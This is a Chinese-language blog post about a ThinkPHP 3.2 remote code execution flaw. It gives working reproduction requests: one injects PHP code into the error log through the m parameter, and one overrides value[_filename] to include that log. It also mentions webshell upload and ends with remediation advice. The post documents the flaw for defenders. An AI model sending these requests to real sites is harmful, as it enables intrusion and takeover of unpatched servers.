当前位置:首页 > 网络安全交流 > 正文内容

ThinkPHP 3.2远程代码执行漏洞

14324472931年前 (2024-04-07)网络安全交流804

ThinkPHP 3.2远程代码执行漏洞,该漏洞产生原因是由于在业务代码中如果对模板赋值方法assign的第一个参数可控,则导致模板路径变量被覆盖为携带攻击代码路径,造成文件包含,代码执行等危害。

复现:

https://网址/index.php?m=--><?=phpinfo();?>

目的:通过错误的m参数导致thinkphp报错,写入至日志文件

https://网址/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_04_07.log      log文件名为当前日期

通过篡改模板文件的路径导致被注入的在此处执行,通过该注入方式,将可以上传webshell获取网站的最终权限。
该漏洞在thinkphp 3.2.5内已修复

修复建议:
1.修改日志文件的命名规则,加入随机字符串来防止被猜测数文件名称。
2.限制模板文件的引用后缀名检查,防止越界访问文件。

扫描二维码推送至手机访问。

版权声明:本文由爱开发博客发布,如需转载请注明出处。

本文链接:https://www.lovekf.cn/?id=20

分享给朋友:

“ThinkPHP 3.2远程代码执行漏洞” 的相关文章

docker镜像chishin/nginx-proxy-manager-zh疑似有后门程序

docker镜像chishin/nginx-proxy-manager-zh疑似有后门程序

服务器内部安装了汉化版的chishin/nginx-proxy-manager-zh镜像,突然发现cpu异常排除发现此镜像内部tcd进程异常,占用大量cpu。分析tcd进程发现大量异常连接请求...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。